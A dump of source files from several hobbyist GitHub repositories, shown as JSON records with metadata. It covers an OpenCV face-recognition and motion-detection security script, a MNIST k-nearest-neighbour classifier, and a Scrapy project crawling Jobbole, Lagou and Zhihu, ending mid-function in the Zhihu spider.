h) in faces:\n nbr_predicted, conf = recognizer.predict(predict_image[y: y + h, x: x + w])\n if conf < 60:\n insert_data = \"INSERT INTO access_entries( subject_id, access_time, confidence, origin_x, origin_y, height, width) VALUES (\" + str(nbr_predicted) + \",'\" + str(datetime.datetime.now().strftime(\"%A %d %B %Y %I-%M-%S%p\")) + \"',\" + str(conf) + \",\" + str(x) + \",\" + str(y) + \",\" + str(h) + \",\" + str(w) + \");\"\n #print(insert_data)\n cur.execute(insert_data)\n find_subject = \"SELECT subject_name FROM subjects WHERE subject_id = \" + str(nbr_predicted) + \";\"\n #print(find_subject)\n cur.execute(find_subject)\n cur.fetchone()\n for (subject_name) in cur:\n name = subject_name[0]\n print \"{} is Correctly Recognized with confidence {} at x={}, y={}, w={}, h={} .\".format(name, conf, x, y, w, h)\n #print(cur2)\n find_authentication = \"SELECT subject_id FROM authentication_table WHERE room_id = \" + str(room_id) + \";\"\n #print(find_authentication)\n cur.execute(find_authentication)\n cur.fetchall()\n global alarm\n for valid_subject in cur:\n if str(valid_subject[0]) == str(nbr_predicted):\n alarm = 0\n break\n else:\n alarm = 1\n print \"Face not identified with {} where confidence {} at x={}, y={}, w={}, h={} .\".format(nbr_predicted, conf, x, y, w, h)\n cv2.imshow(\"Recognizing Face\", predict_image[y: y + h, x: x + w])\n key = cv2.waitKey(1) & 0xFF\n # if the `q` key is pressed, break from the loop\n if key == ord(\"q\"):\n break\n\n\ndef 
motion_detect(camera_id):\n motion_camera_feed = cv2.VideoCapture(camera_id)\n\n # initialize the first frame in the video stream\n firstFrame = None\n frame_count = 0\n\n global alarm\n alarm = 0\n\n # loop over the frames of the video\n while(motion_camera_feed.isOpened()):\n ret, frame = motion_camera_feed.read()\n frame_count += 1\n text = \"Unoccupied\"\n #cv2.imshow(\"Camera Feed\", frame)\n if motion_camera_feed is not None and frame_count %10 ==0:\n start_time = datetime.datetime.now()\n #print(\"Start time :\" + str(start_time.strftime(\"%A %d %B %Y %I-%M-%S%p %f\")))\n # resize the frame, convert it to grayscale, and blur it\n frame = imutils.resize(frame, width=500)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n\n\n # if the first frame is None, initialize it\n if firstFrame is None:\n firstFrame = gray\n continue\n\n # compute the absolute difference between the current frame and\n # first frame\n frameDelta = cv2.absdiff(firstFrame, gray)\n thresh = cv2.threshold(frameDelta, 75, 255, cv2.THRESH_BINARY)[1]\n\n # dilate the thresholded image to fill in holes, then find contours\n # on thresholded image\n thresh = cv2.dilate(thresh, None, iterations=2)\n (cnts, _) = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n # loop over the contours\n for c in cnts:\n # if the contour is too small, ignore it\n if cv2.contourArea(c) < 500:\n continue\n\n # compute the bounding box for the contour, draw it on the frame,\n # and update the text\n (x, y, w, h) = cv2.boundingRect(c)\n #cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n text = \"Occupied\"\n insert_data = \"INSERT INTO motion_entries(room_id,occupied_time) VALUES (\" + str(room_id) + \",'\" + str(datetime.datetime.now().strftime(\"%A %d %B %Y %I-%M-%S%p\")) + \"');\"\n #print(insert_data)\n cur.execute(insert_data)\n\n # draw the text and timestamp on the frame\n if text == \"Unoccupied\":\n b, g, r = 0, 255, 0\n else:\n b, g, r = 0, 0, 255\n if alarm == 1:\n cv2.putText(frame, \"Unauthorized Access (ALARM) \".format(text), (10, frame.shape[0] - 25),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 1)\n else:\n cv2.putText(frame, \"Authorized Access\".format(text), (10, frame.shape[0] - 25),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 0), 1)\n cv2.putText(frame, \"Room Status: {}\".format(text), (10, 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (b, g, r), 2)\n cv2.putText(frame, datetime.datetime.now().strftime(\"%A %d %B %Y %I:%M:%S%p\"),\n (10, frame.shape[0] - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 255, 0), 1)\n\n cv2.imshow(\"Security Feed: \"+str(camera_id), frame)\n #cv2.imshow(\"Thresh\", thresh)\n #cv2.imshow(\"Frame Delta\", frameDelta)\n\n #face detection\n faces = face_cascade.detectMultiScale(frame, 1.3, 5)\n i = 1\n for (x, y, w, h) in faces:\n img = Image.fromarray(frame[y:y + h, x:x + w])\n face_detected = img.convert('L')\n filename = './detected_faces/face_detected' + str(i) + '.png'\n cv2.imwrite(filename, np.array(face_detected))\n # cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\n recognize(filename)\n # roi_gray = gray[y:y+h, x:x+w]\n # roi_color = frame[y:y+h, x:x+w]\n i += 1\n\n end_time = datetime.datetime.now()\n #print(\"End time : \" + str(end_time.strftime(\"%A %d %B %Y %I-%M-%S%p %f\")))\n diff = end_time-start_time\n print(\"Frame = \" + str(frame_count) + \" Difference = \" + str(divmod(diff.total_seconds(), 60)))\n key = cv2.waitKey(1) & 0xFF\n\n # if the `q` key is pressed, break from the lop\n if key 
== ord(\"q\"):\n break\n # cleanup the camera and close any open windows\n motion_camera_feed.release()\n cv2.destroyAllWindows()\n\n\ndef main_func():\n camera1 = 0\n camera2 = 1\n training()\n\n\n motion_detect(camera1)\n #motion_detect(camera2)\n\n db.close()\n\nmain_func()"
},
{
"alpha_fraction": 0.553575336933136,
"alphanum_fraction": 0.5655292272567749,
"avg_line_length": 40.83636474609375,
"blob_id": "02668fd35efb4d720808dbadaf81ed553d7059be",
"content_id": "cae865e9289dd8c529ea45a0ee79f8d9f04f89cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4601,
"license_type": "no_license",
"max_line_length": 316,
"num_lines": 110,
"path": "/accessdetection.py",
"repo_name": "Reznov9185/Ensuring-Security-Using-Computer-Vision",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport cv2, os, datetime, MySQLdb\nfrom PIL import Image\n\ndb = MySQLdb.connect(host=\"localhost\",\n user=\"root\",\n passwd=\"root\",\n db=\"surveillance_db\")\ncur1 = db.cursor()\ncur2 = db.cursor()\n\n# Haar cascade classifier for classifying frontal face\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\nif face_cascade.empty():\n raise Exception(\"Can not find your cascade classifier file . Are you sure, the path is correct ?\")\n\n# Start train for recognition\n# For face recognition we will use the LBPH Face Recognizer\nrecognizer = cv2.createLBPHFaceRecognizer()\n\ndef training():\n def get_images_labels(path):\n image_paths = [os.path.join(path, f) for f in os.listdir(path)]\n images = []\n labels = []\n for image_path in image_paths:\n # Read the image and convert to grayscale\n image_pil = Image.open(image_path).convert('L')\n # Convert the image format into numpy array\n image = np.array(image_pil, 'uint8')\n # Get the label of the image\n nbr = int(os.path.split(image_path)[1].split(\".\")[0].replace(\"subject\", \"\"))\n # Detect the face in the image\n faces = face_cascade.detectMultiScale(image)\n # If face is detected, append the face to images and the label to labels\n for (x, y, w, h) in faces:\n images.append(image[y: y + h, x: x + w])\n labels.append(nbr)\n cv2.imshow(\"Adding faces to traning set...\", image[y: y + h, x: x + w])\n cv2.waitKey(50)\n # return the images list and labels list\n return images, labels\n\n # Path to the Yale Dataset\n path = './training_faces'\n # Call the get_images_and_labels function and get the face images and the\n # corresponding labels\n images, labels = get_images_labels(path)\n cv2.destroyAllWindows()\n\n # Perform the training\n recognizer.train(images, np.array(labels))\n\n# recognizer\n\n\ndef recognize(filename):\n predict_image_pil = Image.open(filename).convert('L')\n predict_image = np.array(predict_image_pil, 'uint8')\n faces = face_cascade.detectMultiScale(predict_image)\n for (x, y, w, h) in faces:\n nbr_predicted, conf = recognizer.predict(predict_image[y: y + h, x: x + w])\n if conf < 100:\n insert_data = \"INSERT INTO access_entries( subject_id, access_time, confidence, origin_x, origin_y, height, width) VALUES (\" + str(nbr_predicted) + \",'\" + str(datetime.datetime.now().strftime(\"%A %d %B %Y %I-%M-%S%p\")) + \"',\" + str(conf) + \",\" + str(x) + \",\" + str(y) + \",\" + str(h) + \",\" + str(w) + \");\"\n #print(insert_data)\n cur1.execute(insert_data)\n find_subject =\"SELECT subject_name FROM subjects WHERE subject_id = \" + str(nbr_predicted) + \";\"\n print(find_subject)\n cur2.execute(find_subject)\n cur2.fetchone()\n for (subject_name) in cur2:\n name = subject_name[0]\n print \"{} is Correctly Recognized with confidence {} at x={}, y={}, w={}, h={} .\".format(name, conf, x, y, w, h)\n #print(cur2)\n else:\n print \"{} not identified with confidence at x={}, y={}, w={}, h={} .\".format(nbr_predicted, conf, x, y, w, h)\n cv2.imshow(\"Recognizing Face\", predict_image[y: y + h, x: x + w])\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ndef main_func():\n camera_feed = cv2.VideoCapture(0)\n training()\n frame_count = 0\n while (camera_feed.isOpened()):\n ret, frame = camera_feed.read()\n frame_count += 1\n if frame_count % 60 == 0 and camera_feed is not None:\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n i = 1\n for (x, y, w, h) in faces:\n img = Image.fromarray(frame[y:y + h, x:x + w])\n 
face_detected = img.convert('L')\n filename = './detected_faces/face_detected' + str(i) + '.png'\n cv2.imwrite(filename, np.array(face_detected))\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\n recognize(filename)\n roi_gray = gray[y:y + h, x:x + w]\n roi_color = frame[y:y + h, x:x + w]\n i += 1\n cv2.imshow('Camera Feed', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n camera_feed.release()\n cv2.destroyAllWindows()\n\nmain_func()"
}
] | 4 |
try1995/k-Nearest-Neighbor-Nearest-Neighbor-Classifier
|
https://github.com/try1995/k-Nearest-Neighbor-Nearest-Neighbor-Classifier
|
a3959e5157ff0afe0b31a06431d9743530ef2a94
|
540c5ee20618cf0b4f880b62acf522db654137fa
|
cbda98728c83778ad9f5f7cc3fae3da9dfa17eba
|
refs/heads/master
| 2020-05-24T14:05:15.446810 | 2019-05-19T01:55:33 | 2019-05-19T01:55:33 | 187,302,525 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6084855198860168,
"alphanum_fraction": 0.6240601539611816,
"avg_line_length": 26.80596923828125,
"blob_id": "4275dfdcabc67d18fda26c1ee745fd7746f37926",
"content_id": "ae910a5a39c758006324b65203b8aa0ce29ef5b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1902,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 67,
"path": "/utils.py",
"repo_name": "try1995/k-Nearest-Neighbor-Nearest-Neighbor-Classifier",
"src_encoding": "UTF-8",
"text": "import os\nimport struct\nimport numpy as np\nimport matplotlib.pyplot as plt\nmnist_path = r\"./MINST\"\n\n\ndef load_mnist(path, kind='train'):\n \"\"\"Load MNIST data from `path`\"\"\"\n labels_path = os.path.join(path, '%s-labels.idx1-ubyte' % kind)\n images_path = os.path.join(path, '%s-images.idx3-ubyte' % kind)\n with open(labels_path, 'rb') as lbpath:\n magic, n = struct.unpack('>II', lbpath.read(8))\n labels = np.fromfile(lbpath, dtype=np.uint8)\n\n with open(images_path, 'rb') as imgpath:\n magic, num, rows, cols = struct.unpack('>IIII', imgpath.read(16))\n images = np.fromfile(imgpath, dtype=np.uint8).reshape(len(labels), 784)\n\n return images, labels\n\n\ndef image_show_many(images_matrix, labels_matrix):\n fig, ax = plt.subplots(nrows=2,ncols=5, sharex=True, sharey=True)\n ax = ax.flatten()\n for i in range(10):\n img = images_matrix[labels_matrix == i][0].reshape(28, 28)\n ax[i].imshow(img, cmap='Greys', interpolation='nearest')\n ax[i].set_title(i)\n ax[0].set_xticks([])\n ax[0].set_yticks([])\n plt.tight_layout()\n plt.show()\n\n\ndef image_show(images_matrix):\n fig, ax = plt.subplots()\n img = images_matrix.reshape(28, 28)\n ax.imshow(img, cmap='Greys', interpolation='nearest')\n ax.set_xticks([])\n ax.set_yticks([])\n plt.tight_layout()\n plt.show()\n\n\ndef svm_loss(x, y, w):\n # x一维行向量,y用一个整数表示标签,w权值矩阵\n scores = w.dot(x)\n margins = np.maximum(0, scores - scores[y] + 1)\n margins[y] = 0\n loss_i = np.sum(margins)\n return loss_i\n\n\ndef softmax_loss():\n pass\n\n\ndef full_loss(loss, w, x):\n ret = np.average(loss) + x*np.sum(pow(np.array(w), 2))\n return ret\n\n\nif __name__ == '__main__':\n images_matrix, labels_matrix = load_mnist(mnist_path)\n # print(type(images_matrix), labels_matrix)\n image_show_many(images_matrix, labels_matrix)"
},
{
"alpha_fraction": 0.843137264251709,
"alphanum_fraction": 0.843137264251709,
"avg_line_length": 29.600000381469727,
"blob_id": "b55b8b611bd0d7adcab616c4c8a7cb031a1fb96d",
"content_id": "53546f0ba0652dc313f4839a20d1c188f460711d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 307,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 5,
"path": "/README.md",
"repo_name": "try1995/k-Nearest-Neighbor-Nearest-Neighbor-Classifier",
"src_encoding": "UTF-8",
"text": "# k-Nearest-Neighbor-Nearest-Neighbor-Classifier;\nKNN算法和最近邻算法,训练集是手写体训练集MINST;\n训练集已经解压,untils中有打开方法和转化数据集为图片的方法\n小练习,命名比较随意,请海涵,如有错误,欢迎交流指导;\n个人邮箱:[email protected]\n"
},
{
"alpha_fraction": 0.6071428656578064,
"alphanum_fraction": 0.6221804618835449,
"avg_line_length": 35.06779479980469,
"blob_id": "11f0b8e6c9e0d03f03e721d1dff9377ccba7b6bc",
"content_id": "953dba67b6815b63615ed5a553e94fb0a904b07a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2264,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 59,
"path": "/KNN.py",
"repo_name": "try1995/k-Nearest-Neighbor-Nearest-Neighbor-Classifier",
"src_encoding": "UTF-8",
"text": "from KNN_FOR_MINST_DATABSE.nearest_neighbor import *\nfrom KNN_FOR_MINST_DATABSE.utils import *\n\n\nclass KNearestNeighbor:\n def __init__(self, X, y, k):\n self.ytr = y\n self.Xtr = X\n self.k = k\n\n def predict(self, X):\n num_test = X.shape[0]\n Ypred = np.zeros(num_test, dtype=self.ytr.dtype)\n for i in range(num_test):\n # print(\"正在比较第%s个\" % (i+1))\n distances = np.sum(np.abs(self.Xtr - X[i, :]), axis=1)\n k_ls = []\n flag = self.k\n while flag:\n min_index = np.argmin(distances)\n k_ls.append(self.ytr[min_index])\n distances = np.delete(distances, min_index, axis=0)\n flag -= 1\n Ypred[i] = np.argmax(np.bincount(np.array(k_ls)))\n\n return Ypred\n\n\ndef test_nearest_neighbor_classifier(slices):\n images_matrix, labels_matrix = load_mnist(mnist_path)\n text_images_matrix, text_labels_matrix = load_mnist(mnist_path, kind='t10k')\n NNAPP = NearestNeighbor(images_matrix, labels_matrix)\n ret = NNAPP.predict(text_images_matrix[0:slices])\n # print('predict_labels:', ret)\n # print('real_labels:', text_labels_matrix[0:slices])\n print(np.mean(ret == text_labels_matrix[0:slices]))\n\n\ndef test_k_nearest_neighbor_classifier(k, slices):\n images_matrix, labels_matrix = load_mnist(mnist_path)\n text_images_matrix, text_labels_matrix = load_mnist(mnist_path, kind='t10k')\n NNAPP = KNearestNeighbor(images_matrix, labels_matrix, k)\n ret = NNAPP.predict(text_images_matrix[0:slices])\n # print(np.mean(text_labels_matrix == ret))\n # print('predict_labels:', ret)\n # print('real_labels:', text_labels_matrix[0:slices])\n print(np.mean(ret == text_labels_matrix[0:slices]))\n\n\nif __name__ == '__main__':\n '''300为训练个数,越大时间越长,\n 建议第一次跑30,3,5,6,7,9为k的值,将上面的注释去掉可以打印输出预测的标签和真实标签,\n 函数输出的是准确率'''\n N = 300\n test_k_nearest_neighbor_classifier(3, N)\n test_k_nearest_neighbor_classifier(5, N)\n test_k_nearest_neighbor_classifier(7, N)\n test_k_nearest_neighbor_classifier(9, N)\n test_nearest_neighbor_classifier(N)\n"
}
] | 3 |
sunzhongyuan/ArticleSpider
|
https://github.com/sunzhongyuan/ArticleSpider
|
e3c3a89fb20a701dc02e9fd2ca169359bd23017f
|
a92b66a2fa3f3c9190435423b5d5eeb09429bd60
|
dcf9bd867948ec6eeb125a4e17df0efcf0e5cf98
|
refs/heads/master
| 2021-04-26T22:30:10.580913 | 2018-03-06T16:12:10 | 2018-03-06T16:12:10 | 124,103,729 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5146048069000244,
"alphanum_fraction": 0.5420961976051331,
"avg_line_length": 30.45945930480957,
"blob_id": "a48820f8ba138537a6d82f1d63bce79f1d307c72",
"content_id": "d3551d113e904d645d5a53d0b960771e2a994af2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1164,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 37,
"path": "/ArticleSpider/spiders/baidu_trans.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass BaiduTransSpider(scrapy.Spider):\n name = 'baidu_trans'\n allowed_domains = ['http://fanyi.baidu.com']\n start_urls = ['http://fanyi.baidu.com']\n\n agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'\n header = {\n 'Host': 'fanyi.baidu.com',\n 'Referer': 'http://fanyi.baidu.com/translate',\n 'User-Agent': agent\n }\n\n def parse(self, response):\n with open('aaa.html', 'wb') as w:\n w.write(response.text.encode('utf-8'))\n post_data = {\n 'from': 'en',\n 'to': 'zh',\n 'query': 'GitHub test',\n 'transtype': 'translang',\n 'simple_means_flag': '3'\n }\n return [scrapy.FormRequest(\n url='http://fanyi.baidu.com/translate#en/zh/GitHub%20test',\n formdata=post_data,\n headers=self.header,\n callback=self.to_file\n )]\n\n def to_file(self, response):\n print(response.text)\n with open('bbb.html', 'wb') as w:\n w.write(response.text.encode('utf-8'))\n"
},
{
"alpha_fraction": 0.6677486896514893,
"alphanum_fraction": 0.6716902256011963,
"avg_line_length": 36.17241287231445,
"blob_id": "ee043115551fcaec314dae601458efdcdb057910",
"content_id": "30b2728a60c299ab8797260b730ca09e78df7a09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5483,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 116,
"path": "/ArticleSpider/pipelines.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nfrom scrapy.pipelines.images import ImagesPipeline\nimport codecs # python2中用这个读写文件可以避免字符编码问题,python3中直接用open打开就行\nimport json\nfrom scrapy.exporters import JsonItemExporter # scrapy提供的用于将item导出成Json模式,还支持其他模式\nimport MySQLdb # 用于创建数据库链接\nimport MySQLdb.cursors\nfrom twisted.enterprise import adbapi # 提供异步容器,这里用于异步操作数据库\n\n\nclass ArticlespiderPipeline(object):\n def process_item(self, item, spider):\n return item\n\n\n# 导出json文件第一种方法:手动进行json文件的导出\nclass JsonWithEncodingPipeline(object):\n # 自定义json文件的导出\n def __init__(self):\n # 打开一个json文件\n self.file = codecs.open('article.json', 'w', encoding='utf-8')\n\n def process_item(self, item, spider):\n # item转换为json模式,ensure_ascii=False如果不写这个的话写入中文的时候会乱码,写了这个字符会以unicode的模式转换为json\n lines = json.dumps(dict(item), ensure_ascii=False)\n # 把生成的json串写入json文件\n self.file.write(lines)\n return item\n\n # 在这个函数里关闭文件\n def spider_close(self, spider):\n self.file.close()\n\n\n# 插入数据库第一种方法:同步插入mysql数据库\nclass MysqlPipeline(object):\n def __init__(self):\n self.conn = MySQLdb.connect('127.0.0.1', 'root', '1218', 'article_spider', charset='utf8', use_unicode=True)\n self.cursor = self.conn.cursor()\n\n def process_item(self, item, spider):\n insert_sql = '''\n insert into article(title, url, url_object_id, create_date, fav_nums)\n values (%s, %s, %s, %s, %s)\n '''\n # cursor.execute是同步执行\n self.cursor.execute(insert_sql, (item['title'], item['url'], item['url_object_id'], item['create_date'], item['fav_nums']))\n self.conn.commit()\n\n\n# 导出json文件第二种方法:利用scrapy提供的模块导出json文件\nclass JsonExporterPipeline(object):\n def __init__(self):\n self.file = open('article_export.json', 'wb') # 以二进制的方式打开\n self.exporter = JsonItemExporter(self.file, encoding='utf-8', ensure_ascii=False) # 实例化JsonItemExporter\n self.exporter.start_exporting() # 第一步start_exporting\n\n def spider_close(self, spider):\n self.exporter.finish_exporting() # 第三步finish_exporting\n self.file.close()\n\n def process_item(self, item, spider):\n self.exporter.export_item(item) # 第二步export_item\n return item\n\n\n# 插入数据库第二种方法:利用twisted异步插入数据库\nclass MysqlTwistedPipeline(object):\n def __init__(self, dbpool):\n self.dbpool = dbpool\n\n @classmethod # 类方法,类不用实例化就可以调用的方法\n def from_settings(cls, settings): # 这个方法sipder会调用,将setting文件传入, 在这里可以获取setting文件内容\n dbparms = dict(\n host=settings['MYSQL_HOST'], # 这样获取setting文件参数\n db=settings['MYSQL_DBNAME'],\n user=settings['MYSQL_USER'],\n password=settings['MYSQL_PASSWORD'],\n charset='utf8',\n cursorclass=MySQLdb.cursors.DictCursor,\n use_unicode=True\n ) # 这些是连接数据库需要的参数,key值对应MySQLdb.connect的参数名\n dbpool = adbapi.ConnectionPool('MySQLdb', **dbparms) # 生成连接池,目前只支持关系型数据库\n\n return cls(dbpool) # 返回一个当前类的实例\n\n def process_item(self, item, spider):\n query = self.dbpool.runInteraction(self.do_insert, item) # 利用twisted异步执行sql语句\n query.addErrback(self.handle_error, item, spider) # 处理异步执行的异常,传入item是为了查看哪个item出错\n\n # 这个函数打印sql错误信息,传入item、spider便于查看哪错了\n # 调试时可以在这里打断点,及时发现错误\n def handle_error(self, failure, item, spider):\n print(failure)\n\n # 这里执行具体的sql语句\n # 为了达到公用的目的,避免每个item都写一个sql,这里将sql语句写在了item的get_insert_sql函数里,\n # 调用get_insert_sql方法得到insert语句,执行这个语句即可\n def do_insert(self, cursor, item):\n insert_sql, params = item.get_insert_sql()\n cursor.execute(insert_sql, params)\n\n\n# 继承自ImagesPipeline,ImagesPipeline是scrappy提供的下载图片模块,重写这个类的方法可以自定义一些功能\nclass 
ArticleImagePipeline(ImagesPipeline):\n def item_completed(self, results, item, info): # 重写这个方法可以获取图片文件保存到本地的路径\n if 'front_image_url' in item: # 公共下载模块,如果没有图片要下载,就不执行以下获取图片存储路径的语句,否则会报错\n for ok, value in results: # results中存储了图片存放的路径,results是一个元祖(True or False, {'path':'full/image.jpg'})\n image_file_path = value['path']\n item[\"front_image_path\"] = image_file_path\n return item\n\n"
},
{
"alpha_fraction": 0.6246246099472046,
"alphanum_fraction": 0.6276276111602783,
"avg_line_length": 26.33333396911621,
"blob_id": "b388ef90e24cee0e74b154b0c095ea147f705552",
"content_id": "b822bf319b5472b5b40cec814751c3b080715696",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 333,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 12,
"path": "/main.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n__author__ = 'zyzy'\n\nfrom scrapy.cmdline import execute\nimport sys\nimport os\n\nsys.path.append(os.path.dirname(os.path.abspath(__file__)))\n# execute(['scrapy', 'crawl', 'jobbole'])\nexecute(['scrapy', 'crawl', 'lagou'])\n# execute(['scrapy', 'crawl', 'zhihu'])\n# execute(['scrapy', 'crawl', 'baidu_trans'])\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.61654132604599,
"alphanum_fraction": 0.6240601539611816,
"avg_line_length": 13.777777671813965,
"blob_id": "79f6c53d55f715edf6d606c577b8eb545a04d802",
"content_id": "ccd3227661953537114caf0e49bac533005ca801",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 133,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 9,
"path": "/ArticleSpider/utils/zheye_test.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n__author__ = 'zyzy'\n\nfrom zheye import zheye\n\n\nz = zheye()\npositions = z.Recognize('a.gif')\nprint(positions)\n"
},
{
"alpha_fraction": 0.6958041787147522,
"alphanum_fraction": 0.7543706297874451,
"avg_line_length": 26.926828384399414,
"blob_id": "f8fe094353a4ecb83e50ec5caa4e0253d1f61212",
"content_id": "783bda30eff54da87c295a64163f0626ec758939",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1218,
"license_type": "no_license",
"max_line_length": 223,
"num_lines": 41,
"path": "/ArticleSpider/utils/test.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n__author__ = 'zyzy'\n\nimport urllib.request\nimport http.cookiejar\n\nurl = 'http://www.baidu.com'\nurl = 'http://fanyi.baidu.com/translate#en/zh/GitHub%20is%20home%20to%20over%2020%20million%20developers%20working%20together%20to%20host%20and%20review%20code%2C%20manage%20projects%2C%20and%20build%20software%20together.'\n\n# 直接通过url来获取网页数据\nprint('第一种')\nresponse = urllib.request.urlopen(url)\ncode = response.getcode()\nhtml = response.read()\nmystr = html.decode(\"utf8\")\nresponse.close()\nprint(mystr)\nwith open('bbbb.html', 'w') as w:\n w.write(mystr)\n\n# 构建request对象进行网页数据获取\nprint('第二种')\nrequest2 = urllib.request.Request(url)\nrequest2.add_header('user-agent', 'Mozilla/5.0')\nresponse2 = urllib.request.urlopen(request2)\nhtml2 = response2.read()\nmystr2 = html2.decode(\"utf8\")\nresponse2.close()\nprint(mystr2)\n\n# 使用cookies来获取\nprint('第三种')\ncj = http.cookiejar.LWPCookieJar()\nopener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))\nurllib.request.install_opener(opener)\nresponse3 = urllib.request.urlopen(url)\nprint(cj)\nhtml3 = response3.read()\nmystr3 = html3.decode(\"utf8\")\nresponse3.close()\nprint(mystr3)"
},
{
"alpha_fraction": 0.6150326132774353,
"alphanum_fraction": 0.6275025606155396,
"avg_line_length": 44.27979278564453,
"blob_id": "80a6602e9967bd7bbec32568634a8fd61932da55",
"content_id": "04101367572de734d490b1e78af01a101996eac7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10585,
"license_type": "no_license",
"max_line_length": 699,
"num_lines": 193,
"path": "/ArticleSpider/spiders/zhihu.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport re\nimport json\nimport time\nfrom PIL import Image\nfrom urllib import parse\nfrom scrapy.loader import ItemLoader\nfrom items import ZhihuQuestionItem, ZhihuAnswerItem\nimport datetime\n\n\nclass ZhihuSpider(scrapy.Spider):\n name = 'zhihu'\n allowed_domains = ['www.zhihu.com']\n start_urls = ['http://www.zhihu.com/']\n\n agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'\n header = {\n 'HOST': 'www.zhihu.com',\n 'Referer': 'https://www.zhihu.com',\n 'User-Agent': agent\n }\n\n # 获取问题回答的url,第一个参数是问题的ID,第二个参数offset是从第几个获取,limit=20表示每次返回回答的个数,默认20\n answer_url = 'https://www.zhihu.com/api/v4/questions/{0}/answers?include=data%5B*%5D.is_normal%2Cadmin_closed_comment%2Creward_info%2Cis_collapsed%2Cannotation_action%2Cannotation_detail%2Ccollapse_reason%2Cis_sticky%2Ccollapsed_by%2Csuggest_edit%2Ccomment_count%2Ccan_comment%2Ccontent%2Ceditable_content%2Cvoteup_count%2Creshipment_settings%2Ccomment_permission%2Ccreated_time%2Cupdated_time%2Creview_info%2Crelevant_info%2Cquestion%2Cexcerpt%2Crelationship.is_authorized%2Cis_author%2Cvoting%2Cis_thanked%2Cis_nothelp%2Cupvoted_followees%3Bdata%5B*%5D.mark_infos%5B*%5D.url%3Bdata%5B*%5D.author.follower_count%2Cbadge%5B%3F(type%3Dbest_answerer)%5D.topics&offset={1}&limit=20&sort_by=default'\n\n # yield的request没有指定callback函数,默认调用这个函数\n def parse(self, response):\n # 深度优先爬取知乎\n # 这里从知乎主页获取所有URL链接,循环这些链接,判断链接格式,是question的进行question解析,\n # 不是question的循环调用本函数,继续判断url格式\n\n # 获取本页面所有的url\n all_urls = response.css('a::attr(href)').extract()\n # 拼接成完整url\n all_urls = [parse.urljoin(response.url, url) for url in all_urls]\n # 过滤URL\n all_urls = filter(lambda x: True if x.startswith('https') else False, all_urls)\n # 循环URL\n for url in all_urls:\n # 调试指定页面时可以指定url\n # url = 'https://www.zhihu.com/question/41363928'\n print(url)\n # 判断URL格式,是问题页面的,request获取这个页面,在parse_question函数中解析问题,存储到问题的item里\n match_obj = re.match('(.*zhihu.com/question/(\\d+))', url)\n if match_obj:\n request_url = match_obj.group(1)\n question_id = match_obj.group(2)\n yield scrapy.Request(request_url, headers=self.header, meta={'question_id': question_id},\n callback=self.parse_question)\n # 